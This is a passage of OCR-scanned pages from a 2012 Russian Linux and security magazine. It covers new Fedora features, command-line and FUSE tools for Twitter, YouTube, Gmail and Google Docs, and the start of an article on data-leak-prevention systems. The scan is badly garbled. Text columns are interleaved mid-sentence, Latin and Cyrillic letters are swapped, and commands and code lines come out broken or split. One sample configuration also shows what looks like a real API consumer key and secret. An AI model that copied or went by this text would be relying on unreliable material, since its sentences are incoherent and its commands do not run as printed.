произошел переход на за­

отличающийся интеллектуаль­

и добавляет их в список!, поддерживающий

/usг/lib . Нововведение это не только и не столь­ ко косметическое, сколько глубоко практиче­

ДРУГИЕ ИНТЕРЕСНЫЕ ИЗМЕНЕНИЯ

UNICODE

ское. Дело в том, что, по мнению разработчиков

В 15-ю версию Fedoгa был добавлен демон

ческим интерфейсом. Из системы также была

дистрибутива, /Ьin, /sЬin и /lib уже давно по­

fiгewalld, позволяющий изменять правила па­

полностью удалена прослойка

теряли свой смысл как каталоги для хранения

кетного фильтра на лету, без перезагрузки всех

Abstгaction Layeгl, вместо которой теперь ис­

базовой системы, которая может быть загруже­

правил и разрыва сетевых соединений. Так

пользуется

на, даже если каталога /usг нет на месте lв ста­

как для управления демоном служит протокол

предназначенными для управления дисковыми

рые времена его было принято подключать

с помощью NFSI. В то же время перемещение всех системных файлов в /usг позволит создать

0-BUS,

им может воспользоваться любое при­

и обладающий полноценным графи­

udev совместно

с

HAL IHaгdwaгe

udisks

и upoweг,

накопителями lв том числе и для выполнения

ложение с соответствующими полномочиями.

автомонтированияl и контроля питания. За счет

Для уnравления демоном из командной строки

удаления

предусмотрена утилита fiгewall-cmd, с по­

ки системы и ее реагирования на подключение

трюки, как, например, загрузка разных версий

мощью которой можно работать с правилам и,

внешних устройств.

системы с помощью монтирования разных /usг-

отталкиваясь от имен служб, а не IР-адресов

более гибкую систему, чтобы выполнять такие

HAL удалось

сократить время загруз­

Fedoгa 16теперьсодержитвкомплектеути­ литу viгt-sandbox, nредназначенную для заnу­

и номеров портов:

ска приложений в изолированном окружении .

#define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define #define

0 CAP_DAC_OVERRIDE 1 CAP_DAC_READ_SEARCH 2 САР _FШ.JNER 3 CAP_FSETID 4 CAP_KILL 5 САР _SETGID Б САР _SETUID 7 CAP_SETPCAP 8 CAP_LINUX_IMMUTABLE 9 CAP_NET_BIND_SERVICE 10 CAP_NET_BROADCAST 11 CAP_NET_ADMIN 12 CAP_NET_RA~ 13 CAP_IPC_LOCK 14 CAP_IPC_O~NER 15 CAP_SYS_MODULE 15 САР _SYS_RAIOO 17 CAP_SYS_CHROOT 18 CAP_SYS_PTRACE 19 CAP_SYS_PACCT 20 CAP_SYS_ADMIN 21 CAP_SYS_BOOT 22 CAP_SYS_NICE 23 САР _CHШ.JN

Сnисок

Capabllities ядра Linux

ХАКЕР

03/158/2012

$ firewall-cmd $ firewall-cmd

В отличие от

--service=ssh --еnаЫе \ --service=samba --timeout=18 $ firewall-cmd --disaЫe \ --service=ipp-client --еnаЫе

selinux-sandbox,

новая утилита

может использовать для формирования <<nе ­ сочницы» любую технологию, поддерживаемую

библиотекой libviгt, например контейнеры

LXC

или виртуальную машину QEMU/ViгtuaiBox. Дистрибутив теперь поддерживаеттех­

В комплекте с той же Fedoгa пределенная файловая

15 идет рас­ система CloudFS, пред­

ставляющая собой расширенную редакцию

нологию безопасной загрузки Tгusted

Boot,

гарантирующую неизменность ядра и си­

стемных компонентов во время загрузки ОС

виртуальной ФС GlusteгFS, которая nредназна­

и, таким образом, предохраняющую систему

чена для развертывания распределенных фай­

от различных руткитов и другого вредоносного

ловых систем.

CloudFS

работает в пространстве

пользователя, поэтому может быть легко

ПО, внедряемого непосредственно в ядро ОС. Для реализации технологии в систему был до­

установлена в других Linuх-дистрибутивах для

бавлен специальный модуль, вызываемый еще

создания гетерогенного кластера.

до загрузки ядра, однако он бесполезен без

В Fedoгa

15 также

изменилась схема име­

нования сетевых интерфейсов, которая теперь

соответствующей аппаратной поддержки . Также реализована система проброса

выглядит следующим образом: встроенным

USВ-устройств на удаленные машины, которая

в материнскую плату llelmbedded lmlotheгboaгdl

позволяет обесnечить, например, доступ к wеЬ­

сетевым адаптерам присваиваются имена

камере с другой машины. Система работает

em1, em2

и т. д., тогда как платы, подключаемые

с помощью где

emO,

PCI,

1- номер

получают имена вида

РС I -слота, а

pci1#2,

2- сетевой

порт.

на основе интегрированного в Fedoгa токола удаленного доступа ной машины

QEMU.

Spice

14 про­

и виртуаль­

П роброс nроисходит в два

Начиная с 15-й версии, Fedoгa можно устано­

этапа : сначала на виртуальную машину, а затем

вить на файловую систему Ыгfs средствами

на удаленную, где осуществляется обратная

штатного инсталлятора. Btгfs отличается высо­

nроцедура проброса устройств на реальную

кой производительностью и дружелюбностью

машину. :::к:

109


UNIXOID

Евгений Зобнин

до небес

lzobniniOgmail.coml

АТЬ ИНТЕГРИРУЕМ LINUX И <<ОБЛАЧНЫЕ>> СЕРВИСЫ

Все мы медленно, но верно переходим к работе во Всемирной паутине, забывая

привычные настольные приложения. Современный мир немыслим без

YouTube, GDocs

Gmail,

и огромного количества веб-сервисов, заменяющих нам обычные

программы . Но так ли нужен веб-браузер, чтобы пользоваться «облачными» приложениями?

до <<облако в >> из командной строки и nре­ дол ж на

вратим файловую систему в инструмент для

ыть операционная сис т ема,

полностью за вязанная на << обла ч ные » при ­

работы с <<об лаками >>.

ложения ? Такой, как ОС-браузер, например

Google

Chгome

пре с л о вутый

05? Или, может быть, такой, Plan9, не делающий различий

как

К Л И Е Н ТЫ << ОБЛАЧ НЫ Х» СЕРВ И СОВ С веб-сервисами не всегда удобно работать

между л ока льными и сетевыми ресурсами?

из окна веб-бра узера. Тот же Twitteг, напри­

Нет, скорее всего, она будет nредставпять

мер, на широком экране занимает максимум

собой нечто с реднее между ними, то есть опе­

nолстраницы, а вытаскивать окно Твиттера

рационку, позволяющую <<хо дить в

из браузера, nодгонять размер этого окна

.. облака">>

и тем и др угим с по собом.

Подви жки в создании подобной ОС нача­

и следить за тем, чтобы случайно его не за­ крыть, долго и н еудобно. К тому же панель

лись уже давно . Те же стандартные окружения

навигации будет меша ть . Гора здо круче

рабочего с тола для Liпux уже на у чили с ь син­

nосадить Т виттер в трей, чтобы о н nоказы­

х ронизировать данные пользователя с <<об лач­

вал новые сообщения в виде всплывающих

НЫМ >> х ранилищем

IUbuntu One], проигрывать видеозаписи из YouTube в окне стандартного медиапроигрывателя ITotem, наnример, умеет

подсказок. Как это сделать? Да просто

зто уже несколько лет] , выводить информацию

для Liпu x есть созданный энтузиастами

с веб-страниц на рабочий стол lвиджеты КОЕ и Google Gadgets] и использовать множество

клиент. Среди Тwittег-к лиент ов наибольшей

др у ги х способов интеграции с веб-сервисами.

рый, п омимо Твиттера , поддерживает еще

В э той ста тье я расскажу, к ак еще более

и

расширить границы соnрикосновения веба

Fг ie ndFeed и

и обычного Linu х-десктопа . Мы рас смо трим

сказать, на любит еля, так как оно очень тя­

множество приложений для раб от ы с <<об­

желовесное и зависит от различных Gпоmе­

лачными >> сервисам и , попробуем дост учат ься

библиотек. Поэтому ценителям аскетизма

110

воспользоваться одним из Тwittег-клиентов .

Почти для каждого п о п улярного ве б-сер виса

nоnулярно с тью nользуется Gwibbeг, кото­

ldenti.ca, StatusNet, Fa cebook, Fl ickг, Digg, Qaiku. Прило жение это, надо

Tyrs- аскетичный Тwittег-клиент для

консоли

ХАКЕР

03 / 158/201 2


Дос тучаться до небе с

.

• • • • • • • • • • • t3 НО.аt~ IКIIIДKI ~ ;:, ·' "' 6.-' В. ~ ~ · & ~+Т 'a.:J

• Устройс:тва.Аrd'оld • ctrome Sjnc • Почтовые кпиенты,

art+N Н0.0. 01\ОЮ 1 !МЖ - -оnмто

\

~

Microsolt OU1Iook

• КtМентыча.та,~GО<9!ТаkИ1111АIМ

Shit+Ctf1+N )

~дкм

Чтобы восnоJЪзова.ТhСЯ ЗТWr.1И f1МГ1С!Ж~. сначаланеобхоДимо сrенермровать nаролм nрмо•ен11i . затем их

B~IIT~~o Копмроеа~ естнмn. 1

~ авест м е соответ~ ГIOJ1A rtJWI()Жei-МA вместо своеrо oбыLiiOI'O napotiR. дпя каждоrо 1'1Мf'10ЖеtМЯ нужно генерировать свой naporь . ~

PI~ T et!C TI

О nосмотриrе RИдео о narюnяx mиnoжetмii! !;iсохр- т~о ст~ttМцукак ...

1

Ctrf+S

l::tайтм .. .

QЬ [}e'I8T8 .. .

Рее~

ctrt+P

введите название, чтобы не :sа.бьnъ. к какому 11рИfЮ1КеtИ0 относится naporь:

имя: !gcx9e-docs

J::tc:Topltll

Д14Смтчер аад~

st.ift+EIC.-

~ <NмсТМП. д- npoc !OOTpo8 ... Соо6щмn. о

ш аг lмs 2. Со3Д8.Ате новыill парель nрмложенмя

C! ri+F

Shift+Ctrf+Deletl

(JI06ne-...

ЗWруакм

"- n....пpw > * о'~

tsодмровка \lk>coд...W код с тр~-.1

ctri+ U

Гlросмотреn. фоноll~ CTPIIИ..IW (lS)

QJ tnJ!aeк• Shift+Ctt1+J :;; .с=.'"' ..,. -.----

ИНс: Тр)'М~ ТW p 81p86oT- I

Shift + Ctfi +l

Кoиi;~}W&S<npl

1 соsдатъ rщюгь

~~~Android" "Gm8illнauoeи•Pflone•

'GOO{Ielllll(

"o..ctook-~ю.n.ю1ep·, ·т~

CМIЩ)OНI'IIмtMII С М118')'МТ ОМ toЬnine9m8il .com nаролм ~ипо~

дата соtдаtмЯ

Дата nосnедн«о мсnолЬ2оваtМА

ctrome

OL12.20U OL12.20U

01.12.2011 02.12.2011

~~

еа·mаМ

a/O"oid

09.01.2012

09.01.2012

~1

~]

Создаем па роль для нawero Gооglе-приложения

Во т та к , л е rким дв иже н и е м рук и , любо й с айт м о ж но превра ти ть в десктоп н ое п р и ложе ни е

я бы порекомендовал посмотреть в сторону

интересных клиентов, как графических, так

ровалея на них из-за п опу л ярности , а не лич­

Рiпо или

и консольных. П ользователи среды Gпome

н ы х прист р ас т ий), т о з д ес ь мож н о выд е лить

в любом дистрибутиве, так ч т о установить их

получают один из таких клиентов в комплекте

несколько инте р ес ны х при л оже н ий. В о­

и попробовать в деле не составит труда. Осо­

с плеером

бого внимания также заслуживает

же целей могут использовать плеер

Hotot.

И тот и другой доступны

TweetDeck

Totem.

Пользователи КОЕ4 для тех

minitube,

первых, это множест в о самых разнообразных «уведомляло к» для

Gmail, лучшими из ко­ CheckGmail и Gmail Notifieг.

-стильный Тwittег-клиент, который особо

позволяющий просматривать, искать видео

торых являются

ценят пользователи маков. Одна беда- он

и со с тавлять плей-листы. Программа не за­

Обе выполняют одну простую за д ачу - сидят

требует

висит от библиотек КОЕ, поэтому подойдет

в трее и выво дя т сообщение п р и п олуче н ии

Adobe AIR,

что неприемлемо для

многих юниксоидов. Поклонники I М-клиента

также приверженцам более экзотических

письма . П о клику происхо д ит п ерехо д н а сайт

P i dgiп должны обязательно обратить внима­

графических сред. Особого внимания за­

Gmail . Аналогичная

ние на Тwittег-плагин для своего фаворита

сл у живает консольный скрипт y outube-vieweг,

называется kdeplasma-gmailпotifieг. Она,

[ он так и называется- pidgiп-twitteг) . Это

позволяющий искать и просматривать видео

в отличие от двух упомянутых вы ш е про г рам ­

даже более удобный и удачный вариант, не­

с помощью штатного МРiауег.

мок, может висе т ь не только в трее [а точнее,

жели полноценное приложение : всё в одном

Просто запусти youtube-vieweг, введи

штуковина для К ОЕ 4

на панели), но и на рабочем сто л е и вообще где угодно, куд а К ОЕ п оз в о л яет засу н у т ь

месте и никаких лишних окон. П оклонники

поисковый запрос, и на экране появит-

консоли также не останутся без вкусного.

ся пронумерованный список из двадцати

плазмоид. Также есть полноценные клие н ты

В репазитариях дистрибутивов предостаточ­

первы х совпадений . После ввода номера

для работы с почто в ой службой. Из наиболее

но Тwittег-клиентов с интерфейсом команд­

н у жн о го ролика он незамедлительно начнет

интересных я бы отметил консольный

ной строки или пcuгses. Один из самых

пр о игрываться в полноэкранном режиме.

почти полностью копирующий интерфейс

простых и удобных написал всем известный

С крипт можно использовать для получения

легендарного п очтового клие нт а

Linuх-разработчик Gгeg Kгoah-Haгtman . Этот

списка самых популярных роликов за день

sup,

Mutt.

Среди утили т команд н ой строки мож н о вы­

клиент называется Ыi и может быть исполь­

[флаг'-!'), списка самых популярных роликов

зован , например, так:

за в с ё время ['-а ' ), поиска плей-листов ['-р')

водит слово/фразу/предложение на указанный

и фильмов ['-М ' ) . Для указания предпо­

язык, и cliweatheг, печатающий текущую

чтительного качества видео предусмотре-

погоду для указанного места земного шара.

ны флаги

'-2', · - з · . '-4', '-7', ·-1· [240р, 360р, 480р, 720р и 1О ВОр соответственно). Также

Оба очень просты в использовании и и д еа л ьно

маленькое чудо. придется поизвращаться

с помощью флага '-sub;гu' можно пере­

ты или, например, соз д анияу в е д ом л е н ий

с ОАuth-аутентификацией, которую исполь­

ключить МРiауег на использование русских

с помощью

зует Твиттер. Для начала в разделе разра­

с у бтитров. Чтобы скрипт выводил больше

ботчика приложений Т виттера

результатов поиска

$ echo

"Му

current uptime is 'uptime'"

1

bti

Однако, чтобы начать использовать это

[tw itter.com/

apps/пew ) необходимо получить Coпsumeг Кеу и Consumeг Secгet и вписать их в конфиг Ыi:

флаг

'-m '. Скрипт

делить скрипт t г aпslatoг, который п росто пере­

подходят для интеграции в различные скри п ­

notify-send:

[50 вместо 20) , используй

$ notify-send

youtube- v iewe г может стать

'cliweather

П огода

\

И НД ЕКС -Г О РОДА'

настоящим открытием для любителей смо­ треть ролики с

YouTube.

Найти и запустить

Команду мож н о п р описат ь в скри n те

$ vi -/.bti

видео с его помощью можно за считанные

и повесить на г орячую клави ш у или в клю­

# Consumer key

сек у нды , а МРiауег обеспечивает гораздо

чить в за д ание

consumer_key;cZy8DdioswAfuЗLJYgбE2w

более высокое качество картинки. Скрипт

использовать один из множес т ва апплетов для

# Consumer secret

особенн о акт у ален при просмотре НО-видео,

отображения пого д ы в трее).

consumer_secret;fniGGUeT12mMWKjmThUdSeKN 32NLWfmnwapwubVQ

с которым f l аsh-проигрыватель справляется

cron [хотя, конечно, уд обнее

Нельзя оставит ь без внимания и набор ути-

плохо, а МРiауег гоняет его без какой-либо значительной нагрузки на процессор. Стоит

Далее следует запустить Ыi. Он напеча­

отметить, что сама скорость загрузки видео

тает на экране адрес страницы, на которой

также повышается [это проверено экспери ­

ты с можешь получить

ментальным п у тем , но с чем связано , неяс­

PIN.

Его необходимо

ввести в ответ Ьti, после чего на экран будут

но). В качестве альтернативы youtube- v ieweг

выведены access_tokeп_key и access_tokeп_

можно использовать

secгet, которые точно так же придется до­

митивный nсuгsеs-интерфейс с vi- п о д обным

бавить в конфиг. Далее Ыi должен заработать,

управлением . Однако он имеет колоссальный

videotop,

имеющий при­

и с его помощью можно будет отправлять

недостаток: требует полной загрузки видео

сообщения прямо из командной строки.

до начала просмотра . Что касается других

Для

серви с ов поискового гиганта [я сконцентри-

YouTube

ХАКЕР

также существует несколько

03/158/20 12

УСТАНОВКА GOOGLE FS В UBUNTU

DOCS

$ sudo add-apt-repository ppa :doct ormo/ppa $ sudo apt -get update $ sudo apt- get instal l googl e-docs- f s

111


UNIXOID лит под названием GDataCopieг, предназначен­

Google Docs. Пакет включает в себя пять простых утилит : gls для просмотра списка документов, gcp для копирования до ­

веб-приложений в отдельных независимых ·

$ google calendar add \

ный для работы с

'День,

когда земля остановилась'

браузера .

3.

Добавление контакта:

Когда-то

$ google contacts add \

gmv

запустила амбициозный

rn.

1.Ql•l <! abs ~~ rol, позво­

ляющий превратить веб-сайт в стандартное

'Евгений Зoбнин,zobnin@gmail.com'

для удаления и перемещения документов со­

ответственно. Пользоваться всем этим добром просто и приятно . Например, для просмотра

Mozilla

проект Pгism 11:1.

кументов с локальной машины и на нее, gmkdiг для создания каталогов и утилиты gгm и

окнах, лишенных элементов управления веб ­

десктопное приложение со своим ярлыком,

процессом управления и прочим и атрибутами

4.

Редактированиедокумента

Google Docs

все х документов из папки «Работа» делаем

[вдефолтном редакторе, имя которого

так :

указано в переменной окружения EDITORI:

обычной программы . Тогда многие адепты компании заявили , что появление подобного проекта- это шаг к светлому будущему <<о б­ лачного >> десктопа, в котором большинство

$ gls

$ google docs edit --title \

userпame@gmail.com:/docs/Paбoтa

Для их экспорта в формате

PDF

столе и з ап уск ать без использования веб­

на локаль ­

5.

н у ю машину- так:

Добавлени е н ово г о альбома в

Picasa [и за­

ливка фото к!:

создания кас т ом ны х браузеров и с вязанны х

userпame@gmail .com: / docs / Paбoтa /*

$ google picasa create --title \ "Мои фотки" -/photos/*.jpg

/ tmp/

Для созда ния каталога- так: П убликация видео на

YouTube:

\. ....

идеи живут и дажевнекотором смысле про­

Например, пресловутый

Google

Chгome

уже давно имеет в своем составе механизм

userna.me@gm;;~Ц_ . !;от;/. dас/t:tовая_папка

GoogleCL,

статочно открыть нужный веб-сайт, перейти

Во время первого обращения к сервису он

ярлыки приложений ... >>, выбрать место раз­

в пункт << Меню

предназначенном для

работы с такими сервисами Гугла, как Bloggeг,

попросит ввести Gооglе-логин [адрес почты

<<Календарь>>, <<Контакты>>

на

[Gmaill, Google Docs,

превращения веб-сайтов в приложения . До­

$ google youtube post --category \ Comedy yжoc.avi

Конечно же, нельзя забывать и о контроль­

ном скрипте

с wеЬ- т ехноло г иями приложенийl, но его цвета ют .

6. gтls<iir

браузера. Проект благополучно загнулся

[а ес л и т оч н ее, переро с во фре йм в о р к для

$ gcp -f pdf \

$

приложений будет работать в Сети , а поль­ зователь сможет размещать их на рабочем

"Список покуnок"

Gmaill и откроет страничк у в браузе ре,

Picasa и YouTube [только добавление видео!.

на которой необходимо п о дтвердить права

Мы уже писали об этой утилите в одном из про­

Goog leCL

шлых номеров, поэт ому я не буду повторяться

следующих запусках сервиса ничего вводить

и просто приведу несколько примеров ее ис­

и подтверждать не н у жно.

на удаленное у правление. При по­

-7

Инструменты

-7

Создать

мещения ярлыка [рабочий стол и/или меню приложенийl, и- вуаля!- на рабочем столе появится ярлык, по клику на котором

в обособленном окне откроется сайт без ненужных обвесок в виде меню браузера

и строк ввода/поиска . То же самое, причем даже из командной строки, можно сделать

пользования.

и с приложениями, установленными с по­

мощью Chгome

Публикация п ос та в благе с помощью

1.

Bloggeг:

Мы нашли массу приложений , способных

Web Stoгe [по клику правой

кнопкой мыши!:

заменить не всегда удобный веб-интерфейс

$ google. b.lagger с c:ti tJ.e 'Я в сЦ :.. 'Oткpt>UJ

рщt --Ьlog

'Linuxoid' \ Googlech l ' .--:tags ' linux, \ ДllЯ . ceбя _Google(:~, . \ .

...... Ы.а. с!:>lа, ..1;11а .: . Добавление события в календарь:

2.

сер висов. Но что если для какого-то экзо­

$ chromium --app=http : //gmail.com

тического веб-сайта еще не разработано нужного приложения или существующие нам

Достаточно интеллектуальный менеджер

не приглянулись [как вариант, понравился

окон сохраняет положение и размеры окна

стандартный веб-интерфейсl ? В этом случае

перед закрытием и восстанавливает его

можно применить технологию

Desktop web

appl i catioп, которая обеспечивает запуск

на прежнем месте при следующем запуске.

Функция веб-приложения есть и в браузере Fiгefox. Здесь всё еще проще : достаточно пере­

> youtube

vieыer

>

lnsert an YouTube Ul!l or search somethi ng .•. linux

1 2 3 4 5

-

Б -

7 В -

9 18 11 12 13 14 15 16 17 18 19 28

-

UberStudent 1/eview - liпux Distro 1/evieloJS lby lnflnitely6alactic ) ( 11 :58) Ubuntu 11 . 18 1/eview- linux Distro 1/evieloJS lby lnfinitelyGalactic) 113 : 12) How То Baclc:up Your Frugal Puppy Using Puppy linux lby icyos ) 183 : 16) Creating а DeЬian AIIM JМG for Archos - linux - Part 2 l by metalx1BBВJ ( 18 :56) linux Mint 12 1/evieы- linux Distro 1/evieloJS lby JnfinitelyGalact i cJ 112:41> linux is Better Тhan llindoloJS lby loclc:ergnome) ! B5:BBJ linux lby llhatYouDughtтoKnow) 184:32) linux Mint 12 1/evieы 1 LA5 1 s19eBB l by jupiterbroadcasting J 155 :49) Js Desktop linux Dead? 1 LAS 1 s19e84 lby jupiterbroadcasting ) 181:18 : 18! linux Opti11ization lby Jockergnome) 185:35) openSUSE 12 . 1 1/evieы 1 Тhе linux Action Sho"'! lby jupiterbroadcasting) (55:52) Pinguy OS 11 . 11! 1/evie"'- linux Oistro 1/evieloJS lby lnfinitelyGalacticJ 118 :44) llindoыs is Better Тhan linux lby loclc:ergnore) 184 :87) Fedora 15 1/evie"'- linux Oistro 1/evieыs l by InfinitelyGalactic) 119:17> Мessages from the linux Cшmunity lby ТhelinuxFoundationJ !85:B3 J linux Mint Cinnai!IOfl Desl<top early lool< Jan 18th 2812 lby linux4UnМe) 187 :56) Тhе Не"' Нui\Ьer One Distro? - linux Mint 12 lby gotЬletuJ 188 :1!3) IIIHOOIIS VISТA AEI/0 VS LIHUX UBUHТU BEI/Yl l by tearbd2J 184 :33 ) An lntro to linux Part 1: llhat is linux? !Тhis lleel< ln linuxJ !Ьу th i sыeelc:inlinux) 183:26) Fedora 16 1/eview- Linux Distro 1/evieыs (Ьу lnfinitelyGalactic) (87:57)

тащить favicoп сайта на рабочий стол, и ярлык появится сам собой.

Зто действительно удобный способ созда­ ния веб-приложений на рабочем столе, но он не лишен некоторых недостатков. В частности, лично меня сильно напрягает, что приложение

будет работать под управлением хоть и лишен­ ного элементов управления, но полноценного

веб-браузера с плагинами, расширениями и всем остальным совершенноненужным

в данном случае балластом, который только сжирает память и процессори не несет

никакой пользы. Позтому я рекомендовал

бы использовать для подобных задач более легкие решения, к примеру минималистичный браузер suгf. Браузер suгf основан на движке

WebKit,

не имеет интерфейса и управляется с помощью клавиатурных комбинаций . Это самый легко­ весный и быстрый из всех браузеров, основан­

Youtube-viewer- консольный скрипт для просмотра роликов с YouTube

112

ных на полноценном НТМL-движке, а потому он

ХАКЕР

03/158/2 01 2


Д остуча ть ся д о н ебес

Sup- Мutt-подобный

клиент для

Gmail

идеально подходит для запуска приложений.

(наnример , в поисках интересн о г о видео

Самый простой вариант его запуска выглядит

на

так :

(например , для управления п о чт ой ! и ис­

YouTubel,

создавать и удалять файлы

пользоват ь р азнообразные пер ен аправления ввода-в ы в о да. Для тех же серв исо в Гугла

$ surf http:)/gmail.com

существ у е т ч етыре таких вирт уал ьных фай­ ловьlх с и сте м ы на основе

в него только узенькую полоску загрузки,

FUSE: Yout ubeFS, GDataFS, Gm aiiFS, Google Docs FS (ес ть еще goofs, но это полузаброшен н ая Jаvа­

На экране появится интерфейс

Gmail

в аб­

солютно голом и чистом виде. Браузер добавит

# vi /etc/gmailfs/gmailfs.conf [account] username = usernamegmail.com password = параль [filesystem] linux_fs_4 fsname

которая отобразится в нижней части окна.

поделка l. Та кж е в Сети можн о н айти f lickгfs ,

Чтобы задать нужные параметры окна сразу

предна з н ач енн у ю для загруз ки изоб ражений

во время запуска, можно воспользоваться

на flickг.co m и MetaWeЫogFS. С ее по мощью

у тилитой wmctгl:

можн о п ости ть в блоги прямо из ком андной

[logs] l evel = INFO logfile = - / gmailfs.log Затем н у жно примонтировать файловую систему:

строки .

Крат к о пройдемся по всем фа й ловым

#!/Ьin/sh

surf http://gmail.com wmctrl -r surf -е ·e,se,se,4ee,зee· С крипт откроет

Gmail

размер окна равным

в окне suгf, сделает

400 х 300

и разместит

его в левом верхнем углу, с отступом

50 слева

и сверху. С помощью среды рабочего стола

системам и попробуем разобрать с я, к а к и х

использовать. Итак, Youtube FS !code .goog le. com/p/youtubefs/1 - файловая си ст ема для до­ ст у па к YouTube. Этой системы нет в большин­

$ ./gma ilfs.py

allow_root

поnе

\

/ путь /до/каталога

Теперь перейдем к Google Docs FS (code. google .com/p/google-docs-fs/1 . Эта файловая

стве дистриб у тивов, однако для ее у стан о в к и

система предоставляет доступ к документам

достаточно с качать с сайта тарболл и распако­

Google Docs.

вать его . Пользоваться так:

как и все остальные ФС в нашем обзоре:

$ ./youtubefs .py username@gmail.com \

$ gmount

Использовать ее так же просто,

скрипт легко превратить в ярлык и поместить

на рабочем столе .

/ nуть / до /ка талог а

\

username@gmail.com

/ путь / до /каталога

П осле этого в указанном каталоге появят­

После этого в катало г е появятся подката­ логи и файлы в точно таком же виде, в каком

Иногда удобнее не использовать специаль­

ся все плей-листы и каналы, на которые

ные клиенты, а монтировать веб-сервисы

ть1 подписан . В каталогах ты найдешь сами

они представлены на сайте

в виде простой файловой системы, где можно

видеозаписи. Аналогичной функционально­

Документы можно копировать, перемещать,

стью обладает

добавлять и удалять. Для отключения исполь­

бродить с помощью файлового менеджера

net l,

GOataFS

( gdatafs . souгcefoгge .

которую можно найти в репазитариях

docs.google.com.

з уем команду gumouпt:

дистрибутивов. Синтаксис ее вызова не­

$ gumount

сколько иной:

GOOGLEAUTH

$ gdatafs

l:i§l:lei!C!I

\

/путь)до/каталога

username@gmail.com

/ путь / до /к аталога

Веб-сервисы с п особны заменить почти

параль

любое настольное приложение. Их не нужно Недавно

Google

изменил метод

Файловая система

GmaiiFS

( sг71 . net/

устанавливать и обновлять. Они позволяют

аутентификации сторонних приложений,

pгojects/gmailfs /1 предназначена для монти­

не беспокои ть ся о сохранности данных и на­

поэтому для каждой программы lскрипта),

рования почтового ящика

строек . Однако сам интерфейс веб-сервиса

ет на основе протокола

может не подойти некоторым пользователям

работающей с аккаунтом

Google, nридется

Gmail. Она работа­ IMAP, поэтому перед

создать отдельный nа роль . Для этого заходим

ее использованием придется включить его

или оказаться слишком тяжеловесным или

на страницу

https://www.goog le.com/set-

поддержку в настройках сервиса (Настрой­

назойливым. В этом случае удобнее об­

tings, далее

выбираем оnцию << Авторизация

ки~ Пересылка и

ратиться к специализированным клиентам

IMAPI.

nараль и задаем новый nараль с nомощью

конфиг

сnециальной формы в конце страницы.

содержания :

03/158/2012

~Включить

После этого необходимо создать

nриложений и сайтов ~Изменить», вводим

ХАКЕР

POP/IMAP

/etc/gmailfs/gmailfs.conf

следующего

и файловым системам, которые, как ты смог убеди ть ся, в достаточном количес тв е имеют­ ся на просторах Сети . :::И:

113


SYN/ACK

Сергей « gгindeг » Яремчук lgгindeгlё!synack.гul

БОРЬБА С УТЕЧКАМИ КОРПОРАТИВНОЙ ИНФОРМАЦИИ

-

Важныйэтап в развертывании

DLP

-внедрение, когда

В современном мире одним из ключевых экономических ресурсов является

информация. Кто ей владеет, тот будет иметь успех, в то же время утечка данных практически всегда означает потерю клиентов, а то и крах компании . Именно

поэтому сегодня так велик интерес к DLР-решениям, позволяющим выявлять и предотвращать передачу конфиденциальной информации. Выбор большой, лидеры еще не сформировались, а предложения часто схожи по функциям, но отличаются логикой работы и заложенными принципами, поэтому определиться не так просто.

необходимо четко сформулировать требования и ожидания

и «Обесnечить »

DLP

-

всеми данными для

контроля .

Репозиторий

для

Ubuntu MyDLP- <tow_n_-

~111.edгatecb .

иm.lц!шn.tu .

ХАКЕР

03/158/2012

.


В поисках и н сай д ера

КАК ВЫБРАТЬ

DLP?

Информационная безопасность стала одной из состав л яющих дея­

тельности любой компании, а соответствующие риски влияют на ее рейтинг и привлекательность для инвесторо в . П о ста т истике, в е ­ роя т ность утечки конфиде н циальной информа ц ии из-за дейст в ий

сотрудника организации [и н сай д ера] превы ш ает вероят н ост ь уте ч ­ ки в результате взлома, причем это не обяза т ельно умышленные действия, пользователь может случайно отпра в ить файл не тому адресату. Д о появления интернета контролировать деятельнос т ь

ОШИБКА В РАБОТЕ

DLP

МОЖЕТ

ПРИВЕСТИ К БЛОКИРОВКЕ ВПОЛНЕ ЛЕГАЛЬНОГО ТРАФИКА И ПОМЕШАТЬ РАБОТЕ СОТРУДНИКОВ

сотрудников было практически невозможно. Н ет, установить контроль, конечно, было реал ь но, но технических средс т в для автоматизации про ц есса не су щ ествовало. Сейчас всё изме н илось.

ражения и т. п.]. Хорошие системы, как правило, используют все

Деловая переписка ведется по электронной почте, пользователи

доступные технологии , а администратор может легко создавать

общаются посредством

правила самостоятельно на основе подготовленных шаблонов .

lM

и

VoiP,

обмениваются файлами, ведут

блоги, публикуют сообщения в сацсетях и т. д. Все эти каналы

Кроме того, DLР-система должна обеспечивать службу безопасно­

легко контролировать автоматически, мощность современных

сти инструментом для анализа всех событий и архивом переданной

серверов и емкость носителей позволяют собирать и обрабаты в ать

информации. Еще одним критерием, определяющим выбор

данные в реальном времени. Ч тобы обнаружит ь и пре д отврати т ь

является возможность блокировать утечку дан н ых в реальном вре­

передачу конфиденциальных данных на разных эта п ах [при пере­ меще нии, использовании и хранении ] , применяется целый класс

мени. Однако специалисты по-разному относятся к этой функции,

систем защиты-

особенно на этапе ввода в эк с плуатацию] может привести к бло­

DLP [Data Leak

Ргеvепtiоп] . На сегодня суще­

ведь ошибка в работе

DLP,

DLP [а ложные срабатывания случаются,

ствует еще с десяток терминов-синонимов для таких сис т ем:

кировке вполне легального трафика, а значит, помешать работе со­

[lпfoгmatioп

трудников . Поэтому многие администраторы предпочитают анализ

ILDP Leak Detectioп & Pгeveпtion], IPC [lnfoгmation Pгotection and Contгol], ILP [lпfoгmatioп Leak Ргеvепtiоп] и др . Задача у них,

по факту, а не блокировку.

в общем-то, простая - мониторинг, и д ентификация и защита .

Официальных стандартов, о п ре д еляющих, какой д олжна быть

DLP,

WEBSENSE DATA SECURITY SUITE

пока не существует, поэтому разработчики nо-разному смо т рят

Са й т проекта :

на функции

Лицензия:проприетарная .

DLP.

Часто можно встретить самые разные реали­

websense.com .

зации, не всегда включающие действительно необходимое или,

ОС с ервер :

наоборот, напичканные ненужным функционалом, добавлен н ым

ОС клиенты: Windows Vista , 7, 2003, 2008/R2.

по заказу компании. Однако со временем определились некотор ы е

Русифи к ация: отсутствует.

требования, которыми должно обладать полнофункциональное

Windows Server 2003 R2 .

Калифорнийская корпорация

Websense

хорошо известна как

DLР-решение. В первую очередь они касаются д иапазона возмож­

производитель систем филырации веб-трафика, в частности,

ных каналов утечки:

в

электронная почта

[SMTP, РОРЗ, IMAP];

Facebook

вскоре будет внедрена ее разработка для защиты при

переходе по внешним ссылкам. Решения ориентированы в первую

